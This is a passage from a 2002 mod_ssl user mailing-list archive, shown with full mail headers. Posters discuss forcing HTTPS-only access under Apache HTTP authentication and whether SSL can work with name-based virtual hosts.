someone mistypes the URL (typing http://host:port/ instead of https://host:port/), the password will be sent over the internet without encryption. Granted, Apache won't actually serve up any PAGES once the user's authenticated over HTTP (it'll just throw the "Bad Request" message), but I'd rather that the passwords couldn't be sent that way at all. Is there any way to get Apache to completely disregard any regular HTTP traffic? I'm running Apache 1.3.24 and mod_ssl 2.8.8. Thanks much in advance, and apologies for the badly-worded request. My communication skills seem to be severely malfunctioning this morning. :) -CJ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 17:23:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA21222; Fri, 5 Apr 2002 17:22:10 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maila.telia.com id RAA21210; Fri, 5 Apr 2002 17:21:49 +0200 (MET DST) Received: from d1o900.telia.com (d1o900.telia.com [213.66.140.241]) by maila.telia.com (8.11.6/8.11.6) with ESMTP id g35FLm100892 for ; Fri, 5 Apr 2002 17:21:48 +0200 (CEST) Received: from DANALIEN (h43n3fls22o900.telia.com [213.65.205.43]) by d1o900.telia.com (8.10.2/8.10.1) with SMTP id g35FLkd02529 for ; Fri, 5 Apr 2002 17:21:46 +0200 (CEST) Message-Id: <200204051521.g35FLkd02529@d1o900.telia.com> From: "Danalien" To: "modssl-users@modssl.org" Date: Fri, 05 Apr 2002 17:21:44 +0200 X-Mailer: PMMail 2000 Professional (2.20.2360) For Windows 2000 (5.0.2195;2) In-Reply-To: <20020405090116.C688@hbs.net> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Subject: Re: Respond only to SSL requests? Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Danalien" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I'm no expert, but thought of redirecting all http (port 80) to https (port 443)? Using the redirect (and or redirectmatch) directive(s), http://httpd.apache.org/docs/mod/mod_alias.html#redirect Something like, Redirect / https://www.yousite.com/ >Hello, list . . . > >I've got a website that uses Apache, mod_ssl and HTTP authentication. >Apache only listens on one port, and the only protocol I want to support >on it is HTTPS. This is almost working okay: Apache won't serve up any >pages if the client is using ordinary HTTP. It just gives a "Bad Request" >response. > >However, because I'm using HTTP authentication, Apache still >challenges the browser even if it's trying to use HTTP, which means that >if someone mistypes the URL (typing http://host:port/ instead of >https://host:port/), the password will be sent over the internet without >encryption. Granted, Apache won't actually serve up any PAGES once >the user's authenticated over HTTP (it'll just throw the "Bad Request" >message), but I'd rather that the passwords couldn't be sent that way >at all. > >Is there any way to get Apache to completely disregard any regular HTTP >traffic? I'm running Apache 1.3.24 and mod_ssl 2.8.8. > >Thanks much in advance, and apologies for the badly-worded request. My >communication skills seem to be severely malfunctioning this morning. :) > >-CJ // with regards // ID :: danalien :: PGP Public Key Fingerprint: C891 D3A1 427A A5E7 449F B19E 1E85 A109 -----BEGIN PGP SIGNATURE----- Version: PGPsdk version 1.7.1 (C) 1997-1999 Network Associates, Inc. and its affiliated companies. iQA/AwUBPK2y+R6FoQlEaqKIEQJb0ACfVLaYMXCiSym89mDJOW+A9mYQzl0AoOab 1pqQ7vtVhHx8fL0nsWWX8Ed6 =PMD/ -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 18:22:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA24516; Fri, 5 Apr 2002 18:21:37 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from COMAL.uanet.edu id SAA24476; Fri, 5 Apr 2002 18:20:40 +0200 (MET DST) content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Subject: SSL and vhosts X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3 Date: Fri, 5 Apr 2002 11:19:30 -0500 Message-ID: <4EAB3F5D46284A408F6A998255B118810868A5@COMAL.uanet.edu> Thread-Topic: SSL and vhosts Thread-Index: AcHcvanrGoRJE5BoTYaXQDzmg4vLlA== From: "Hunt,Keith A" To: Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA24493 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Hunt,Keith A" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Please pardon me if this is a dumb question. I have read that SSL and name-based vhosts cannot be done, yet I set it up and it seems to be working OK, apart from the expected complaints about mismatched host name and server certificate. Am I missing something? I am running Apache 1.3.23 and modssl 2.8.7. on Linux Keith Hunt 330.972.2968 keith@uakron.edu Internet & Server Systems The University of Akron ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 18:47:24 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA25492; Fri, 5 Apr 2002 18:46:21 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from exchange00.SC.ESILICON.COM id SAA25470; Fri, 5 Apr 2002 18:45:44 +0200 (MET DST) Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19) id ; Fri, 5 Apr 2002 08:45:38 -0800 Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D1D91@exchange00.SC.ESILICON.COM> From: David Marshall To: "'modssl-users@modssl.org'" Subject: RE: SSL and vhosts Date: Fri, 5 Apr 2002 08:45:33 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Marshall X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users After Apache 1.3.19 (I believe) name-based virtual hosts work with SSL and get the right certificate if a. each name-based host has a unique ip address An easy way to do this is to multihome a nic. b. Traffic for the host comes in with the right ip address I Mention this if you are using firewalls and address translation. b. If using a passphrase, all certificates need to use the same passphrase. I have been using this with Stronghold 3 build 3014 and higher. StrongHold is RedHat's Apache/Mod_SSL package. David Marshall -----Original Message----- From: Hunt,Keith A [mailto:keith@uakron.edu] Sent: Friday, April 05, 2002 8:20 AM To: modssl-users@modssl.org Subject: SSL and vhosts Please pardon me if this is a dumb question. I have read that SSL and name-based vhosts cannot be done, yet I set it up and it seems to be working OK, apart from the expected complaints about mismatched host name and server certificate. Am I missing something? I am running Apache 1.3.23 and modssl 2.8.7. on Linux Keith Hunt 330.972.2968 keith@uakron.edu Internet & Server Systems The University of Akron ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 18:55:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA25878; Fri, 5 Apr 2002 18:54:23 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from COMAL.uanet.edu id SAA25874; Fri, 5 Apr 2002 18:54:11 +0200 (MET DST) content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Subject: RE: SSL and vhosts X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3 Date: Fri, 5 Apr 2002 11:53:01 -0500 Message-ID: <4EAB3F5D46284A408F6A998255B1188106B5E4@COMAL.uanet.edu> Thread-Topic: SSL and vhosts Thread-Index: AcHcwbrfeHOFfrz+SiKqMnOB3mI20wAAFPIA From: "Hunt,Keith A" To: Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA25875 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Hunt,Keith A" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hmmm. I am only using a single IP address. If I was going to use separate IP addresses, then I wouldn't be using name-based vhosts. > -----Original Message----- > From: David Marshall [mailto:dmarshall@esilicon.com] > Sent: Friday, April 05, 2002 11:46 AM > To: 'modssl-users@modssl.org' > Subject: RE: SSL and vhosts > > > After Apache 1.3.19 (I believe) name-based virtual hosts work > with SSL and > get the right certificate if > > a. each name-based host has a unique ip address > An easy way to do this is to multihome a nic. > b. Traffic for the host comes in with the right ip address > I Mention this if you are using firewalls and address translation. > b. If using a passphrase, all certificates need to use the > same passphrase. > > I have been using this with Stronghold 3 build 3014 and > higher. StrongHold > is RedHat's Apache/Mod_SSL package. > > David Marshall > > > -----Original Message----- > From: Hunt,Keith A [mailto:keith@uakron.edu] > Sent: Friday, April 05, 2002 8:20 AM > To: modssl-users@modssl.org > Subject: SSL and vhosts > > > > Please pardon me if this is a dumb question. I have read that SSL and > name-based vhosts cannot be done, yet I set it up and it > seems to be working > OK, apart from the expected complaints about mismatched host > name and server > certificate. Am I missing something? I am running Apache > 1.3.23 and modssl > 2.8.7. on Linux > > > Keith Hunt 330.972.2968 keith@uakron.edu > Internet & Server Systems > The University of Akron > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 19:03:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA26199; Fri, 5 Apr 2002 19:02:15 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from exchange00.SC.ESILICON.COM id TAA26161; Fri, 5 Apr 2002 19:01:24 +0200 (MET DST) Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19) id ; Fri, 5 Apr 2002 09:01:18 -0800 Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D1D95@exchange00.SC.ESILICON.COM> From: David Marshall To: "'modssl-users@modssl.org'" Subject: RE: SSL and vhosts Date: Fri, 5 Apr 2002 09:01:16 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Marshall X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Then you are going to continue to get the certificate warnings as the certificate will have to be the same for all vhosts. As result your users will have the mismatched host and server complaints. At my shop, we would say that is not working :). David -----Original Message----- From: Hunt,Keith A [mailto:keith@uakron.edu] Sent: Friday, April 05, 2002 8:53 AM To: modssl-users@modssl.org Subject: RE: SSL and vhosts Hmmm. I am only using a single IP address. If I was going to use separate IP addresses, then I wouldn't be using name-based vhosts. > -----Original Message----- > From: David Marshall [mailto:dmarshall@esilicon.com] > Sent: Friday, April 05, 2002 11:46 AM > To: 'modssl-users@modssl.org' > Subject: RE: SSL and vhosts > > > After Apache 1.3.19 (I believe) name-based virtual hosts work > with SSL and > get the right certificate if > > a. each name-based host has a unique ip address > An easy way to do this is to multihome a nic. > b. Traffic for the host comes in with the right ip address > I Mention this if you are using firewalls and address translation. > b. If using a passphrase, all certificates need to use the > same passphrase. > > I have been using this with Stronghold 3 build 3014 and > higher. StrongHold > is RedHat's Apache/Mod_SSL package. > > David Marshall > > > -----Original Message----- > From: Hunt,Keith A [mailto:keith@uakron.edu] > Sent: Friday, April 05, 2002 8:20 AM > To: modssl-users@modssl.org > Subject: SSL and vhosts > > > > Please pardon me if this is a dumb question. I have read that SSL and > name-based vhosts cannot be done, yet I set it up and it > seems to be working > OK, apart from the expected complaints about mismatched host > name and server > certificate. Am I missing something? I am running Apache > 1.3.23 and modssl > 2.8.7. on Linux > > > Keith Hunt 330.972.2968 keith@uakron.edu > Internet & Server Systems > The University of Akron > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 19:04:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA26233; Fri, 5 Apr 2002 19:03:15 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from engrsrv8.eng.lsu.edu id TAA26208; Fri, 5 Apr 2002 19:02:37 +0200 (MET DST) Received: from DESG01 (engw0236.eng.lsu.edu [130.39.28.236]) by engrsrv8.eng.lsu.edu (8.11.2/8.11.2) with ESMTP id g35H0We15388 for ; Fri, 5 Apr 2002 11:00:32 -0600 From: "Steve Gonzales" To: Subject: RE: SSL and vhosts Date: Fri, 5 Apr 2002 11:02:07 -0600 Message-ID: <000401c1dcc3$9e4ca0c0$ec1c2782@eng.lsu.edu> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 In-Reply-To: <4EAB3F5D46284A408F6A998255B118810868A5@COMAL.uanet.edu> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Steve Gonzales" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I also am running Apache 1.3.23 +mod_ssl 2.8.7. Along with mod_perl 1.26 +openssl 0.9.6c +php 4.1.2: I've had no known problems. I also have the expected certificate complaint on the first time when a user visits one of our secure sites. The entire process for installation can be viewed at http://www.eng.lsu.edu/installations/apache.html. Since I'm new to apache, any suggestions would be most appreciated. Steve Gonzales Louisiana State University gonzo@eng.lsu.edu Division of Engineering Services 225.578.6069 (v) 3216G CEBA 225.578.5990 (f) Baton Rouge, LA 70803 -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Hunt,Keith A Sent: Friday, April 05, 2002 10:20 AM To: modssl-users@modssl.org Subject: SSL and vhosts Please pardon me if this is a dumb question. I have read that SSL and name-based vhosts cannot be done, yet I set it up and it seems to be working OK, apart from the expected complaints about mismatched host name and server certificate. Am I missing something? I am running Apache 1.3.23 and modssl 2.8.7. on Linux Keith Hunt 330.972.2968 keith@uakron.edu Internet & Server Systems The University of Akron ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 19:24:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA27413; Fri, 5 Apr 2002 19:23:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from COMAL.uanet.edu id TAA27407; Fri, 5 Apr 2002 19:22:59 +0200 (MET DST) content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Subject: RE: SSL and vhosts X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3 Date: Fri, 5 Apr 2002 12:21:48 -0500 Message-ID: <4EAB3F5D46284A408F6A998255B118810868A6@COMAL.uanet.edu> Thread-Topic: SSL and vhosts Thread-Index: AcHcw8GQc61AVG8mQVyOQXUrb1fZ3AAAQlvw From: "Hunt,Keith A" To: Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA27410 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Hunt,Keith A" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > -----Original Message----- > From: David Marshall [mailto:dmarshall@esilicon.com] > Sent: Friday, April 05, 2002 12:01 PM > To: 'modssl-users@modssl.org' > Subject: RE: SSL and vhosts > > > Then you are going to continue to get the certificate warnings as the > certificate will have to be the same for all vhosts. As > result your users > will have the mismatched host and server complaints. At my > shop, we would > say that is not working :). Well, that all depends on what one is trying to accomplish -- this case is for a known, limited, internal user population. As I said, the mismatch between host names and cert names is expected at this point. Heck, the cert I am using doesn't match the box at all, let alone the vhost name. This is still a test machine. My next step would be to see if separate certs could be used for separate vhosts and eliminate the mismatched name problem. I haven't decided whether that is even very important for my purposes. What is perplexing to me is not the mismatched names issue, but rather why this works at all when everything I have read says it won't. That is, it won't work at all in the sense that the encrypted connection cannot be established because of the sequence things are done in the handshake. > > David > > -----Original Message----- > From: Hunt,Keith A [mailto:keith@uakron.edu] > Sent: Friday, April 05, 2002 8:53 AM > To: modssl-users@modssl.org > Subject: RE: SSL and vhosts > > > Hmmm. I am only using a single IP address. If I was going > to use separate > IP addresses, then I wouldn't be using name-based vhosts. > > > -----Original Message----- > > From: David Marshall [mailto:dmarshall@esilicon.com] > > Sent: Friday, April 05, 2002 11:46 AM > > To: 'modssl-users@modssl.org' > > Subject: RE: SSL and vhosts > > > > > > After Apache 1.3.19 (I believe) name-based virtual hosts work > > with SSL and > > get the right certificate if > > > > a. each name-based host has a unique ip address > > An easy way to do this is to multihome a nic. > > b. Traffic for the host comes in with the right ip address > > I Mention this if you are using firewalls and address > translation. > > b. If using a passphrase, all certificates need to use the > > same passphrase. > > > > I have been using this with Stronghold 3 build 3014 and > > higher. StrongHold > > is RedHat's Apache/Mod_SSL package. > > > > David Marshall > > > > > > -----Original Message----- > > From: Hunt,Keith A [mailto:keith@uakron.edu] > > Sent: Friday, April 05, 2002 8:20 AM > > To: modssl-users@modssl.org > > Subject: SSL and vhosts > > > > > > > > Please pardon me if this is a dumb question. I have read > that SSL and > > name-based vhosts cannot be done, yet I set it up and it > > seems to be working > > OK, apart from the expected complaints about mismatched host > > name and server > > certificate. Am I missing something? I am running Apache > > 1.3.23 and modssl > > 2.8.7. on Linux > > > > > > Keith Hunt 330.972.2968 keith@uakron.edu > > Internet & Server Systems > > The University of Akron > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 19:31:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA27711; Fri, 5 Apr 2002 19:30:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from exchange00.SC.ESILICON.COM id TAA27674; Fri, 5 Apr 2002 19:29:56 +0200 (MET DST) Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19) id ; Fri, 5 Apr 2002 09:29:50 -0800 Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D1D97@exchange00.SC.ESILICON.COM> From: David Marshall To: "'modssl-users@modssl.org'" Subject: RE: SSL and vhosts Date: Fri, 5 Apr 2002 09:29:48 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Marshall X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users What allows me to host several SSL sites with seperate servernames on a single machine without giving users mismatched names/certificate messages is: DocumentRoot <> ServerName www.hosta.domain.com <> ServerAdmin admin@hosta.com << the adminname for this vhost>> ... << all the ssl stuff certificates for www.hosta.domain.com >> ... DocumentRoot <> ServerName www.hostb.domain.com <> ServerAdmin admin@hostb.com << the adminname for this vhost>> ... << all the ssl stuff certificates for www.hostb.domain.com >> ... DNS must resolve www.hosta.domain.com to IPaddr1 www.hostb.domain.com to IPaddr2 unless you are behind a firewall using address translation, then DNS must resolve www.hosta.domain.com to the IP address that your firewall will resolve to IPaddr1 www.hostb.domain.com to the IP address that your firewall will resolve to IPaddr2 David Marshall -----Original Message----- From: Steve Gonzales [mailto:gonzo@eng.lsu.edu] Sent: Friday, April 05, 2002 9:02 AM To: modssl-users@modssl.org Subject: RE: SSL and vhosts I also am running Apache 1.3.23 +mod_ssl 2.8.7. Along with mod_perl 1.26 +openssl 0.9.6c +php 4.1.2: I've had no known problems. I also have the expected certificate complaint on the first time when a user visits one of our secure sites. The entire process for installation can be viewed at http://www.eng.lsu.edu/installations/apache.html. Since I'm new to apache, any suggestions would be most appreciated. Steve Gonzales Louisiana State University gonzo@eng.lsu.edu Division of Engineering Services 225.578.6069 (v) 3216G CEBA 225.578.5990 (f) Baton Rouge, LA 70803 -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Hunt,Keith A Sent: Friday, April 05, 2002 10:20 AM To: modssl-users@modssl.org Subject: SSL and vhosts Please pardon me if this is a dumb question. I have read that SSL and name-based vhosts cannot be done, yet I set it up and it seems to be working OK, apart from the expected complaints about mismatched host name and server certificate. Am I missing something? I am running Apache 1.3.23 and modssl 2.8.7. on Linux Keith Hunt 330.972.2968 keith@uakron.edu Internet & Server Systems The University of Akron ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 19:40:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA28087; Fri, 5 Apr 2002 19:39:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from raq720.uk2net.com id TAA28069; Fri, 5 Apr 2002 19:38:49 +0200 (MET DST) Received: from lt (210.49.111.228.optusnet.com.au [210.49.111.228] (may be forged)) by raq720.uk2net.com (8.9.3/8.9.3) with SMTP id SAA01673 for ; Fri, 5 Apr 2002 18:44:10 +0100 Message-ID: <0a1001c1dcc8$8e7e5b20$0104000a@jumpstartpromotions.com> From: "Jeff" To: References: <691874941F1F954198F7E7FCBAEF1FAE0D1D97@exchange00.SC.ESILICON.COM> Subject: Re: SSL and vhosts Date: Sat, 6 Apr 2002 03:37:24 +1000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jeff" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Which, as has been pointed out already, is NOT (yes NOT) name-based virtual hosting.. It IS IP-based - notice that you show each VHost with a different IP address.. Rgds Jeff ----- Original Message ----- From: "David Marshall" To: Sent: Saturday, April 06, 2002 3:29 AM Subject: RE: SSL and vhosts > What allows me to host several SSL sites with seperate servernames on a > single machine without giving users mismatched names/certificate messages > is: > > > DocumentRoot <> > ServerName www.hosta.domain.com <> > ServerAdmin admin@hosta.com << the adminname for this vhost>> > ... > << all the ssl stuff certificates for www.hosta.domain.com >> > ... > > > > DocumentRoot <> > ServerName www.hostb.domain.com <> > ServerAdmin admin@hostb.com << the adminname for this vhost>> > ... > << all the ssl stuff certificates for www.hostb.domain.com >> > ... > > > DNS must resolve > www.hosta.domain.com to IPaddr1 > www.hostb.domain.com to IPaddr2 > > unless you are behind a firewall using address translation, > then DNS must resolve > www.hosta.domain.com to the IP address > that your firewall will resolve to IPaddr1 > www.hostb.domain.com to the IP address > that your firewall will resolve to IPaddr2 > > David Marshall > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 19:52:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA28600; Fri, 5 Apr 2002 19:51:07 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from raq720.uk2net.com id TAA28549; Fri, 5 Apr 2002 19:50:15 +0200 (MET DST) Received: from lt (210.49.111.228.optusnet.com.au [210.49.111.228] (may be forged)) by raq720.uk2net.com (8.9.3/8.9.3) with SMTP id SAA02228 for ; Fri, 5 Apr 2002 18:55:36 +0100 Message-ID: <0a1401c1dcca$276ddb20$0104000a@jumpstartpromotions.com> From: "Jeff" To: References: <4EAB3F5D46284A408F6A998255B118810868A6@COMAL.uanet.edu> Subject: Re: SSL and vhosts Date: Sat, 6 Apr 2002 03:48:50 +1000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jeff" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Keith, Perhaps it would be better to say "Name-based VHosts will not work correctly or as expected".. If you search the archives, you will find this has been brought up many times and some very good explanations.. Basically, the securing of the channel between browser and server is done BEFORE any HTTP request is sent to the server - so it is impossible for the server to know which name-based VHost you actually want (it will use the certificate for the first NBVH) However, after the channel is secured, then the HTTP request is sent, and the server can identify which NBVH you want and reply appropriately.. Naturally, it is impossible for the certificate of the first NBVH to match more than one NBVH, so users access any other NBVH will always get a certificate/server name mismatch.. Only option for it to work correctly is to use different IP/Port combinations for each SSL-required VHost Rgds Jeff ----- Original Message ----- From: "Hunt,Keith A" To: Sent: Saturday, April 06, 2002 3:21 AM Subject: RE: SSL and vhosts > > Well, that all depends on what one is trying to accomplish -- this case is for a known, limited, internal user population. As I said, the mismatch between host names and cert names is expected at this point. Heck, the cert I am using doesn't match the box at all, let alone the vhost name. This is still a test machine. My next step would be to see if separate certs could be used for separate vhosts and eliminate the mismatched name problem. I haven't decided whether that is even very important for my purposes. > > What is perplexing to me is not the mismatched names issue, but rather why this works at all when everything I have read says it won't. That is, it won't work at all in the sense that the encrypted connection cannot be established because of the sequence things are done in the handshake. > > > > -----Original Message----- > > > From: Hunt,Keith A [mailto:keith@uakron.edu] > > > Sent: Friday, April 05, 2002 8:20 AM > > > To: modssl-users@modssl.org > > > Subject: SSL and vhosts > > > > > > > > > > > > Please pardon me if this is a dumb question. I have read > > that SSL and > > > name-based vhosts cannot be done, yet I set it up and it > > > seems to be working > > > OK, apart from the expected complaints about mismatched host > > > name and server > > > certificate. Am I missing something? I am running Apache > > > 1.3.23 and modssl > > > 2.8.7. on Linux > > > > > > > > > Keith Hunt 330.972.2968 keith@uakron.edu > > > Internet & Server Systems > > > The University of Akron > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 20:48:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA01571; Fri, 5 Apr 2002 20:47:28 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from imo-d10.mx.aol.com id UAA01509; Fri, 5 Apr 2002 20:46:26 +0200 (MET DST) Received: from gjmwalsh@netscape.net by imo-d10.mx.aol.com (mail_out_v32.5.) id m.e9.374d5ab (16228) for ; Fri, 5 Apr 2002 13:45:25 -0500 (EST) Received: from netscape.com (mow-m21.webmail.aol.com [64.12.180.137]) by air-in02.mx.aol.com (v84.14) with ESMTP id 